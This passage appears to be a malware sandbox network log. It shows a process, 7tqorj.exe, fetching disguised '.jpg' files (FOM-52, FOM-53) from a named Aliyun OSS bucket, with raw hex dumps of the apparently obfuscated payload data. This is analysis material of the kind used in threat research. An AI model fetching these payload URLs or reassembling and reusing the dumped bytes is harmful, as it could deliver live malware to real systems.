2025-01-06 03:51:22 UTC	4096	IN	Data Raw: e7 04 8e cb 30 d6 37 73 19 58 f3 d5 05 6a d7 87 a6 a4 b9 8e a3 5d cc d5 8b 34 ca e2 6a a0 78 0e e3 7b 1c 29 5a a6 5b 55 62 f1 e6 be 23 a0 43 ad e5 d7 92 f7 b3 96 4f 03 54 71 e0 f1 af 06 a6 f0 00 d1 7e 0a b5 f4 09 e0 28 9e fb 47 84 32 32 1b 8a 9f c1 2e bc e2 8e a0 2e ff 90 dd 7e c7 83 94 f3 d0 5a 05 5e 0b 2c b3 a4 f8 4a e7 0f 49 f6 3d ff 18 c0 83 1f 5d f8 00 bd db 23 65 28 8b 33 a9 4d 2b 81 26 66 9c dc 18 b6 96 f5 c0 bf 49 34 bb da 49 5e 06 d6 0f 1c e9 ba c4 8c 4c bb 0d 49 a4 6a fd d0 ef 7e 6b 35 34 10 92 02 52 67 16 58 07 e6 47 e0 dc bb dc 14 5e a1 d9 f0 67 70 2c ed fa 8f ca 33 6f ad 4f 2b e0 78 1e f0 18 a4 c5 e4 02 81 a3 0f 9f 0e 1b 45 92 27 fc 39 cc be 57 c0 4c f8 c9 c4 77 47 d4 ac 33 24 78 3d f0 d1 e4 b8 d2 ce 88 69 21 65 3a 2c 1f 95 b1 20 31 6f 2a 06 Data Ascii: 07sXj]4jx{)Z[Ub#COTq~(G22..~Z^,JI=]#e(3M+&fI4I^LIj~k54RgXG^gp,3oO+xE'9WLwG3$x=i!e:, 1o*
2025-01-06 03:51:22 UTC	4096	IN	Data Raw: be d0 2a 4c 19 64 3b ba 0e 94 4e 20 15 9f c2 86 3a 4f 85 f3 ee 58 cd 35 91 2f 10 20 88 da 3e c0 05 f8 22 66 79 44 a0 a8 56 48 12 18 4c 26 67 bf 07 bd 0e 8a 4f b7 62 4f 64 7b 46 88 30 02 d0 63 3b 3d 3c 2c 8c 51 e6 c8 ad 43 c5 a4 f1 40 de 99 5c b6 f7 dc 3c 7d 03 cf d9 bc 50 d4 5c 1b dd e0 e1 e2 85 6d a9 c3 e7 80 7d cd 51 5d 8b 19 fb d4 7c 96 d7 f0 1c 7d 23 ef f9 3d bf d8 fd 3e b9 23 40 ea b3 f0 27 06 c6 ea 0b 81 ce 0f cf e6 d6 16 19 12 9a 03 7d 2b 37 16 c5 97 7f 38 15 f7 a1 1d 02 22 4b 1f a3 92 9d c1 35 82 21 2c 90 85 a7 9e 04 28 f5 b1 d9 e8 96 b1 29 17 fc ee 8c bf c7 80 28 0e ea b1 fb 7e 34 d7 f3 21 35 2f 26 43 09 73 42 b5 c9 ae 73 45 1e 38 5f c7 ea 8b e0 a7 ba f0 52 79 4f c7 e5 a4 8b dd 4b 28 03 3d a1 25 9f ac b6 97 e3 25 09 20 15 2d d1 f6 c6 3d 63 88 5a Data Ascii: *Ld;N :OX5/ >"fyDVHL&gObOd{F0c;=<,QC@\<}P\m}Q]\|}#=>#@'}+78"K5!,()(~4!5/&CsBsE8_RyOK(=%% -=cZ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	49997	118.178.60.9	443	3476	C:\Users\user\Documents\7tqorj.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-06 03:51:34 UTC	115	OUT	GET /FOM-52.jpg HTTP/1.1 User-Agent: GetData Host: 22mm.oss-cn-hangzhou.aliyuncs.com Cache-Control: no-cache
2025-01-06 03:51:34 UTC	547	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Mon, 06 Jan 2025 03:51:34 GMT Content-Type: image/jpeg Content-Length: 5062442 Connection: close x-oss-request-id: 677B5346F947FB3734CEDE47 Accept-Ranges: bytes ETag: "70C21DA900796B279A09040B00953E40" Last-Modified: Mon, 18 Nov 2024 15:32:22 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 360383310743409046 x-oss-storage-class: Standard x-oss-ec: 0048-00000105 Content-Disposition: attachment x-oss-force-download: true Content-MD5: cMIdqQB5ayeaCQQLAJU+QA== x-oss-server-time: 14
2025-01-06 03:51:34 UTC	3549	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10 Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
2025-01-06 03:51:34 UTC	4096	IN	Data Raw: 76 3b 9a 2f a5 d0 56 ab c4 f4 cc a1 12 27 f0 11 4c 94 ef 12 31 58 23 3c c6 b1 ec ba 45 96 46 46 f6 24 8e 89 dd b1 38 89 66 c2 79 d2 b3 b5 25 19 80 c7 28 f9 85 7d 8d 49 94 e3 d2 8b 92 cb f1 27 a5 1e 65 9a 0d 24 21 88 82 f8 05 e3 7e 27 2d b8 d1 e3 32 71 8d ad 95 6c 46 1c 3b d8 e9 eb 13 24 94 d8 16 f1 f4 38 83 ee f5 d4 be 1d b9 53 fa 70 d4 ee cc a4 15 79 67 9f 06 cb 07 19 b1 3e 7c b5 65 18 68 0a c6 22 13 ed 4c ea 2c ff 32 4f 94 a2 b5 94 ef ee d9 86 62 ff a7 83 cf f0 ea c9 44 53 4d 8a 6c 9b cc 06 f2 e6 13 fa 3c 21 8d f7 9f 32 cd 95 50 9a 71 01 f0 c6 0b dd 04 f0 5b 24 6b c6 6c 7f 35 67 68 4a 5b 2d df 32 af ed a0 7b 95 d7 43 07 d1 fb 17 0b 43 df 87 62 69 46 68 e0 eb 47 28 a3 81 aa 32 08 bc 21 f8 7a 14 93 1b c6 2c 1b 7d c3 10 5b d1 12 f7 56 c2 1c 7c e4 85 f3 c4 Data Ascii: v;/V'L1X#<EFF$8fy%(}I'e$!~'-2qlF;$8Spyg>\|eh"L,2ObDSMl<!2Pq[$kl5ghJ[-2{CCbiFhG(2!z,}[V\|
2025-01-06 03:51:34 UTC	4096	IN	Data Raw: 77 a8 c4 d9 fd a7 56 28 73 5f 0f 7f 3b 00 66 82 36 d4 2f 7b 1c 50 0d 90 42 5e 0e b6 3d dc 83 58 6a 35 e0 f2 6f 3a a8 d5 ee 37 cd 99 ee 9c 06 8c d0 87 05 97 4d 50 36 97 03 25 ea e1 52 3c bb 3e 25 ca 4d a1 9a de 65 27 6e 38 2d 65 92 e5 96 84 ff 4a 69 e4 8b 0a 8b 94 f6 d4 7c 01 80 fb e0 03 ea 19 32 5d 29 28 3c ad 5d b5 fc 74 7f 9a bf fa 5f aa b3 08 b5 0d 57 25 c0 b8 67 cb 8c bc e8 48 4a 02 a5 57 78 65 40 ad c1 5a 91 f1 85 ed 06 07 63 d1 27 0a 48 fc b3 b0 df 6f a6 ee 6a 10 26 82 2e 2b 90 38 ca 76 a6 a6 73 fc a4 31 18 8b bd 07 98 fc 6b e9 ca cc 83 78 6a 94 92 3f 5d 02 57 0e 0c a9 36 a3 64 c6 b8 98 a5 03 28 be 9c a1 91 80 1b b7 e8 6f 73 1a dc 78 f5 54 c0 09 e3 53 1a 57 f1 88 1f f9 f7 41 dd c4 eb 74 19 ad 09 5d 4b c5 25 7f a9 10 ba 2e 1a 5c 79 23 15 00 2d cb 6f Data Ascii: wV(s_;f6/{PB^=Xj5o:7MP6%R<>%Me'n8-eJi\|2])(<]t_W%gHJWxe@Zc'Hoj&.+8vs1kxj?]W6d(osxTSWAt]K%.\y#-o
2025-01-06 03:51:34 UTC	4096	IN	Data Raw: f5 f5 f3 fb ff fd f3 f5 f7 f5 f3 eb ef ed d3 d5 d7 d5 d3 dd bf a7 d3 d5 d3 d5 d3 2d 2f 2d 33 37 37 75 32 3d 3f 2d 33 35 27 35 33 2d 2f 3d 53 55 47 55 53 5d 5f 5d 53 45 57 55 53 11 b2 50 73 3f 77 75 73 f1 8d 4d 73 a9 77 75 73 6d 3f 17 53 b5 56 55 53 5d 5f 5d 53 55 57 55 53 2d 2f 2d 33 35 37 35 33 3d 0f 47 33 15 2c 35 33 2d 2f 2d d3 d5 d7 d5 d3 dd df dd d3 d5 d7 d5 d3 ed ef ed f3 f5 f7 f5 f3 fd ff fd f3 f5 f7 f5 f3 4d c9 97 d3 95 d7 d5 d3 dd df dd d3 d5 d7 d5 d3 2d 1f 00 33 51 37 35 33 3d 3f 3d 33 35 37 35 33 2d 2f 2d 53 55 57 55 53 5d 5f 5d 53 55 57 55 53 43 1b 08 0b 01 77 75 73 1e cd 7c 73 75 67 75 73 6d 6f 6d 53 55 57 55 53 5d 5f 5d 53 55 57 55 53 2d 2f 2d 33 15 37 35 53 13 4d 59 52 41 56 35 33 e5 a6 2d d3 d5 07 d4 d3 dd df dd d3 d5 d7 d5 d3 ed ef ed f3 Data Ascii: -/-377u2=?-35'53-/=SUGUS]_]SEWUSPs?wusMswusm?SVUS]_]SUWUS-/-35753=G3,53-/-M-3Q753=?=35753-/-SUWUS]_]SUWUSCwus\|sugusmomSUWUS]_]SUWUS-/-375SMYRAV53-
2025-01-06 03:51:34 UTC	4096	IN	Data Raw: d1 7d e2 3a fb d9 7f 2d 5c 08 7e 89 cb e9 3a 78 19 d3 d3 54 a8 dd 3b c0 68 9c d3 da f6 a0 3f b8 09 85 13 9c b2 89 02 f5 bb 84 84 22 99 a1 5c eb db e4 e4 52 d7 a8 84 57 57 3d d3 53 dd 2c 15 fe 48 f8 17 59 7b 94 02 a5 74 75 f2 ab 6b 6d 53 55 5c 97 a4 8d b7 85 fd 1e 57 33 82 c4 fc f5 5b b3 98 02 7d b4 7b 18 33 b8 53 11 3f c4 e7 e4 99 d5 df 7a 12 6b f1 4b ab 5b 8f 5c 2e 0b c5 75 fb 0d d3 04 7a 6d a5 1d 7f b1 af 41 46 fd 97 72 44 70 9c 6c f0 98 c6 38 c7 3a 4f 9d 67 53 5d 8b 18 45 fa 27 78 f9 2c e7 bf e3 1a 15 03 e6 d9 54 24 d6 03 bf c8 c3 24 e4 ff 0d e1 62 93 bb 32 d3 1d e0 a9 69 56 22 dc 79 04 9f f6 79 91 f4 ce a4 27 3e 2c 7c 5a 6b f3 21 34 52 4f 12 6e 97 99 0b 32 20 48 ad 50 69 a7 06 6a 8b 46 53 7e 44 e7 8d 63 9d 43 d3 36 f2 39 ef 4b 76 db 20 c3 a9 cd f4 6d Data Ascii: }:-\~:xT;h?"\RWW=S,HY{tukmSU\W3[}{3S?zkK[\.uzmAFrDpl8:OgS]E'x,T$$b2iV"yy'>,\|Zk!4ROn2 HPijFS~DcC69Kv m
2025-01-06 03:51:34 UTC	4096	IN	Data Raw: 5c f2 f3 f2 cb a8 4e 59 1d d2 ce 66 43 81 7b ff 67 50 14 99 fb dd 4e 2d 27 1b 3b 32 e1 3d 33 3a 03 dd 71 52 2f 3d b3 f7 09 f2 37 09 35 05 d2 00 d7 a7 6e a2 5b 79 ad 9f 96 b5 c6 ed 9d 66 b3 39 53 74 34 ad bd bc 93 b3 fe 71 77 93 a5 84 18 86 55 55 ba d3 80 5c 53 d8 33 71 4b ee a2 49 17 31 de 70 f5 2e 3f d4 1a 6a 27 35 da f8 c9 29 d3 3d 14 a5 d5 dd 18 d9 f7 74 d2 59 bd 8b 6e 18 e6 02 30 b1 d7 f9 6b fa e2 61 91 0a 36 8b dc 30 3b 0f bb de d3 87 8c 44 53 a3 22 0d aa a3 e3 13 d4 68 4b 97 1e 19 a2 5f ef 4f 5c 9c 5f 83 e2 ed 0e 6b 27 d3 18 e0 1f 57 f6 99 4e 8f 66 e4 e9 d6 c4 39 a5 10 98 95 71 d9 7b bc 71 9c 9c 89 c1 9c 58 3a b4 2b 66 f8 3c 84 df 79 ba 43 96 ad af 4f c6 9e 70 72 72 50 0a 98 50 ac 17 9d c0 f8 94 89 96 25 87 df 01 09 25 05 6d 3f 30 e0 76 8e 06 07 6c Data Ascii: \NYfC{gPN-';2=3:qR/=75n[yf9St4qwUU\S3qKI1p.?j'5)=tYn0ka60;DS"hK_O\_k'WNf9q{qX:+f<yCOprrPP%%m?0vl
2025-01-06 03:51:34 UTC	4096	IN	Data Raw: 20 fb 64 56 1a 91 6e df 20 2c 89 77 e2 e2 05 39 f2 8e f5 00 2d 52 de 02 01 04 ca 1a ce 6a d2 47 a1 f6 d0 fe 59 5f 7b be ab de 7e b5 7b 3a bc 5c 60 b4 14 c4 40 8e 4f 1b d3 50 30 ca 88 05 19 87 a6 6c 44 9c 38 ec 39 0e 59 7b 02 e0 f1 72 5e f5 ad 67 1a cd 99 59 ab ba 5e 62 b2 6a a6 96 6c 3f b0 7f 47 31 af f9 8d b1 e6 2c 04 cc 68 ac 20 ea 27 da fc 3a c9 29 c2 2d 03 bc 6d b2 50 da 12 b2 4e b6 81 da 21 4d f8 86 bb 30 9c c3 3a 42 00 c7 75 98 22 d5 e2 ed f7 ca c4 d5 09 a4 4e 82 04 d4 70 9c 5e b4 e3 6c a8 46 17 b5 25 7a 7b b5 5c 61 52 62 b2 1a fe 80 42 8b a0 8b af 69 84 9a 79 9f 8b 45 e0 9d 05 e1 0c 2d e5 1f 50 b8 e2 04 38 e7 df 32 37 b0 48 b1 af 82 c3 27 a8 d2 aa e1 62 df e9 b2 a2 12 f5 be 96 d6 5d 5d 4d 27 3a 1a 32 92 06 ad 9a 5b a6 db 14 ee 80 13 e1 a7 67 c5 71 Data Ascii: dVn ,w9-RjGY_{~{:\`@OP0lD89Y{r^gY^bjl?G1,h ':)-mPN!M0:Bu"Np^lF%z{\aRbBiyE-P827H'b]]M':2[gq
2025-01-06 03:51:34 UTC	4096	IN	Data Raw: 11 ac 16 c6 07 c4 9d 58 cd bb f4 f0 2b 3a 16 5a da 8a 33 81 27 42 b4 e4 1c b3 44 f3 eb 30 85 ed 13 a0 b4 46 35 68 06 83 59 2b bf 9b 83 03 97 31 12 15 bc 78 b1 76 b9 71 21 32 04 6b 81 a4 83 32 6f d6 69 98 27 df ea f9 0c 4f 4b 67 2f 4b 06 67 44 04 ef 78 60 0a 1a 43 f5 40 32 c2 0d 65 17 e5 08 cc a8 23 c1 d9 dd 70 6e 88 fc 7f 8d 81 6d 3c 8a c0 7c 8f 3d 55 13 79 ca fa 4f 7d 9f 59 1f ab 7a 58 3c b6 7e 0a 9f 2b 23 7e 6a 96 9f 38 e0 63 e5 5a 1a 32 5b b4 2a 2e c8 4b fc 30 60 d4 a2 2b 2b bb 40 ab 29 c3 47 5a c5 72 2a 67 22 60 fd 3a 2c 8c 49 94 ad 10 8c f4 1c aa 13 b2 44 63 6e 0d 2e 1c 0e 75 75 75 69 83 57 e4 6c 56 e5 7f 18 20 b8 d1 37 88 2a 1b 65 fe 57 b8 31 b5 b2 3c d8 01 d7 18 1c 20 44 7d d7 1c 11 ca 50 b1 34 77 e7 17 39 01 6f c0 e8 d3 94 88 53 e8 54 bc 80 c3 59 Data Ascii: X+:Z3'BD0F5hY+1xvq!2k2oi'OKg/KgDx`C@2e#pnm<\|=UyO}YzX<~+#~j8cZ2[.K0`++@)GZrg"`:,IDcn.uuuiWlV 7*eW1< D}P4w9oSTY
2025-01-06 03:51:34 UTC	4096	IN	Data Raw: ef cc 4c d0 d3 09 06 21 8c 0a e4 fd 58 ee 29 db 81 82 6d c1 a4 30 bc c1 88 36 cd ab 62 b5 32 ab fb fb ec 20 e3 1f be d1 52 c7 7b bf 58 54 f3 43 f2 8d 0e 8b f7 13 10 a0 bb 4f ee a1 7a 27 8f 37 90 b6 93 e7 12 94 df b3 75 98 ed 5e 3f 26 b3 6b dc e4 4b ac 06 65 59 29 76 21 46 e6 59 50 ec 8d 23 41 76 61 bd b4 2a c0 a1 d0 00 7d 85 b9 46 a9 73 14 b0 38 5b 50 8e c5 4d 41 4e b1 33 ec 52 c8 9b 60 d6 75 f5 94 ee 23 f4 6f f6 e6 d2 e9 4d 56 be d7 e4 8f 26 6e aa 79 e5 e6 5e 13 6c 17 b6 e2 e2 11 f5 fe 7e 0b 44 9b c6 aa 3a f9 70 8c 7b bc 07 41 a6 db 37 9c 40 ed 30 d4 63 08 f2 34 c3 bc 19 00 1b 0e a0 05 0a d9 18 ea e0 fd 6c 8a 5d c5 2d 44 59 87 c8 6a f8 9f 94 42 5d b7 0d 78 f1 3b 58 f0 58 03 2c 94 05 87 6d 14 59 c3 c8 52 68 6d 20 54 3c df df dd d3 b3 5e da 3a d6 ef ef f3 Data Ascii: L!X)m06b2 R{XTCOz'7u^?&kKeY)v!FYP#Ava*}Fs8[PMAN3R`u#oMV&ny^l~D:p{A7@0c4l]-DYjB]x;XX,mYRhm T<^:
2025-01-06 03:51:34 UTC	4096	IN	Data Raw: 15 03 58 89 56 b4 b6 a2 ad 03 9c f1 67 d1 75 f3 e8 19 38 39 86 89 50 71 f6 9c 55 6e f0 3c 79 b6 4b a6 36 b9 b4 a2 ab 24 ae 39 77 96 dd 86 d0 fd 7d 97 cb 0d f0 c5 e3 02 f9 c1 52 24 d9 92 d5 0f ce ba 02 8d 60 9d a4 7e 46 0c f6 07 7e 6e 99 9f b7 49 61 ff 7c c2 1d c4 45 e2 10 ab 9d 5d f3 48 c7 32 f2 49 bd 7e 2c f3 14 b8 55 84 3b b6 cd f2 2c a2 4e c8 2f 6a 5f 90 af 64 33 93 34 22 de 67 0c 00 0a 07 58 6d 1d 91 a5 e8 77 57 3e 92 ad 64 db 25 db 5a a7 9e fb ee 37 1e bf 9f 1c 20 8f 58 83 8e 9c 9d 1a 84 f4 2f e8 b6 e9 fc 5c 14 cf 3d a8 20 c1 36 73 8b 6d ad fa 19 32 a5 19 e7 34 c8 51 2a b2 c7 6f 71 16 6b 1a c9 12 87 4a 5b 13 27 7e 0c 5d 42 3e 1f df 6d a6 94 82 5a 53 5e fd 07 49 a4 e3 fa f2 49 de ae 8b 50 62 d9 cf c2 ba 82 06 00 8f 34 6e 19 e8 d9 e4 90 5c e0 85 6f a3 Data Ascii: XVgu89PqUn<yK6$9w}R$`~F~nIa\|E]H2I~,U;,N/j_d34"gXmwW>d%Z7 X/\= 6sm24Q*oqkJ['~]B>mZS^IIPb4n\o

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	49998	118.178.60.9	443	3476	C:\Users\user\Documents\7tqorj.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-06 03:51:44 UTC	115	OUT	GET /FOM-53.jpg HTTP/1.1 User-Agent: GetData Host: 22mm.oss-cn-hangzhou.aliyuncs.com Cache-Control: no-cache
2025-01-06 03:51:45 UTC	547	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Mon, 06 Jan 2025 03:51:45 GMT Content-Type: image/jpeg Content-Length: 366410 Connection: close x-oss-request-id: 677B5351E001B43633B5B969 Accept-Ranges: bytes ETag: "DA1D5EB665D3AAD523BE59415E6449ED" Last-Modified: Tue, 22 Oct 2024 14:47:51 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 5641369857548672686 x-oss-storage-class: Standard x-oss-ec: 0048-00000105 Content-Disposition: attachment x-oss-force-download: true Content-MD5: 2h1etmXTqtUjvllBXmRJ7Q== x-oss-server-time: 43
2025-01-06 03:51:45 UTC	3549	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 Data Ascii: JFIFZExifMM*JQQ%Q%CC
2025-01-06 03:51:45 UTC	4096	IN	Data Raw: 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 60 Data Ascii: ```````````````````````````````````````````````````````````````
2025-01-06 03:51:45 UTC	4096	IN	Data Raw: 60 60 60 eb 25 68 30 9f 75 d0 14 62 70 e9 25 84 e3 1d 84 60 15 67 52 a0 89 a9 60 60 60 06 67 e5 4c a2 a0 c6 2b ed ac f1 5f b5 0c d4 a2 b0 c6 29 e5 4e 2b f5 44 2b e2 ac 2b a8 2b b1 29 f5 10 8a f0 6d a5 0c b0 6b ad 34 6b b1 a8 b2 1f f5 2c 94 e2 f0 63 18 1f 95 e7 d2 20 09 68 e0 e0 e0 67 e5 5c a1 a0 a0 a0 ca a4 2d e5 5c f0 ca a8 c8 5f 5f a0 a0 2b ed 74 2b f1 e8 f2 5f b5 08 d4 a2 70 e5 a0 15 59 a7 25 b8 61 60 60 60 a7 25 bc 40 df 62 60 a7 25 80 e8 73 60 60 0a 60 0a 60 ed 25 48 f0 ca a0 ca a0 ca ac 2d ed 78 f1 c8 a4 a0 a0 38 2b f5 74 2b e2 e8 f0 5f b5 00 d4 a2 b0 2b ed 34 26 a1 b3 e1 8a e0 8a e0 8a e0 6b b5 34 b2 88 69 f7 e0 f0 8a e0 8a e0 08 da 10 e0 e0 63 24 fc 2b ed 74 29 e1 e4 10 a1 2b 45 fd 62 a8 a0 f5 2b 4c 18 b8 6a a0 a0 48 9a a7 a1 a0 f6 f7 2b e5 a8 e9 Data Ascii: ```%h0ubp%`gR```gL+_)N+D+++)mk4k,c hg\-\__+t+_pY%a```%@b`%s````%H-x8+t+_+4&k4ic$+t)+Eb+LjH+
2025-01-06 03:51:45 UTC	4096	IN	Data Raw: 2c 9d 9f 9f 31 ed f5 f4 9e 9f 9f 32 88 1d 9d 60 60 e3 a4 70 ed e5 f4 9e 9f 9f 30 ed ed 10 5d 5f 5f f1 5f b5 30 d2 a2 b0 ca a0 c8 20 a0 a0 a0 ca a2 ca a0 ca a2 c8 a0 a0 a0 e0 c8 a0 4c a2 f0 1f f5 74 92 e2 f0 69 65 84 1d 1f 1f 63 5d 84 1d 1f 1f 1f 95 e7 d3 20 09 0a e0 e0 e0 8a e0 6d 35 cc 5d 5f 5f f2 2b e5 a8 f0 48 06 5c a0 a0 23 64 a4 2b ed ac 8b 68 23 49 a1 f1 2b f5 a8 f2 48 f1 9c 60 60 e3 a4 64 eb 2d 68 ed 34 61 61 32 eb e5 04 9d 9f 9f 30 9f 75 f8 12 62 70 eb ed 04 9d 5f 5f f1 5f b5 44 d2 a2 b0 c8 54 a1 a0 a0 5f b5 6c d2 a2 b0 ca a1 c8 8c 4c a2 b0 48 61 5c 5f 5f 63 24 e8 8a e0 88 b8 0c e2 f0 08 dd 1b e0 e0 63 24 e8 63 18 1f 94 d0 8a e0 8a e0 8a e0 6d 75 18 5e 5f 5f f2 c8 24 4c a2 b0 ca a0 5f b5 a0 d3 a2 b0 ca a0 01 68 ec a5 b0 f0 5f b5 3c d2 a2 b0 ca 60 Data Ascii: ,12``p0]___0 Ltiec] m5]__+H\#d+h#I+H``d-h4aa20ubp___DT_lLHa\__c$c$cmu^__$L_h_<`
2025-01-06 03:51:45 UTC	4096	IN	Data Raw: 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 44 45 46 47 48 49 4e 4e 4e 4a 4b 4e 8e 8e 8c 8d f5 2b 4c 21 4c 18 a2 a0 a0 29 2d e8 5d 5f 5f c8 ac 4e a2 b0 48 3e a3 a0 a0 23 64 a4 8a e0 88 f4 0e e2 f0 08 d5 0d 1f 1f 63 24 e8 8a e0 88 d0 0e e2 f0 08 c6 0d 1f 1f 63 24 e8 88 08 a3 a0 a0 5f b5 6c d2 a2 b0 c8 e8 4e a2 b0 5f b5 20 d2 a2 b0 c8 c0 4e a2 b0 5f b5 20 d2 a2 b0 c8 88 63 60 60 9f 75 ac 12 62 70 08 64 61 60 60 ed e5 98 9e 9f 9f 30 0a 60 9f 75 e4 12 62 70 a6 e5 24 5e 5f 5f eb 66 25 25 5e 5f 5f e5 66 25 26 5e 5f 5f f2 66 25 27 5e 5f 5f ee 66 25 28 5e 5f 5f a5 26 65 69 1e 1f 1f ac 26 65 6a 1e 1f 1f d3 26 65 6b 1e 1f 1f d2 26 65 6c 1e 1f 1f ce 26 65 6d 5e 5f 5f c4 66 25 2e 5e 5f 5f cc 66 25 2f 5e 5f 5f cc 66 25 30 5e 5f 5f a0 66 25 d4 5e 5f 5f e7 a6 Data Ascii: NNNNNNNNNNNNNNNNNNDEFGHINNNJKN+L!L)-]__NH>#dc$c$_lN_ N_ c``ubpda``0`ubp$^__f%%^__f%&^__f%'^__f%(^__&ei&ej&ek&el&em^__f%.^__f%/^__f%0^__f%^__
2025-01-06 03:51:45 UTC	4096	IN	Data Raw: 75 90 12 62 70 d8 61 60 60 60 8b 62 8b 80 eb 85 3d a3 35 eb 8c e3 8c 08 37 eb 25 68 e9 25 38 66 e5 3c a0 19 b8 a0 a0 a0 93 60 2d dd 3d 53 0b c6 0b 0a ca c4 2b ed 38 f1 2d f5 3c f2 48 92 2f e0 e0 63 24 ec 6d a5 7c b0 6b ed 28 09 e2 f0 b1 88 78 a5 e5 f0 6b b5 78 63 22 84 b2 08 df 1f 5f 5f 23 64 b0 93 60 ff 2b 45 fd 62 a4 a0 f5 2b 4c ca a0 01 68 49 a2 b0 f0 c8 38 e5 a5 b0 2b ed 68 31 88 7a 9f 9f 9f e3 a4 70 53 a0 3d a2 64 60 35 eb 8c 0a 60 c1 60 60 60 70 30 08 60 60 60 70 2b ed a8 f1 48 58 5e 5f 5f 23 64 b0 93 60 fd 62 a4 a0 f5 2b 4c 21 4c 80 a4 a0 a0 f7 c8 cc 4f a2 f0 1f f5 68 92 e2 f0 69 a5 18 d3 20 86 41 6a dd e5 f0 65 20 95 e5 09 a7 e1 e0 e0 d3 29 86 6b ed 2a 9d a5 b0 29 ed 5c 2b f5 5c 61 42 aa 29 f5 50 ca a0 c8 20 a0 a0 a0 ca a4 ca a0 ca a2 c8 a0 a0 60 Data Ascii: ubpa```b=57%h%8f<`-=S+8-<H/c$m\|k(xkxc"__#d`+Eb+LhI8+h1zpS=d`5````p0```p+HX^__#d`b+L!LOhi Aje )k*)\+\aB)P `
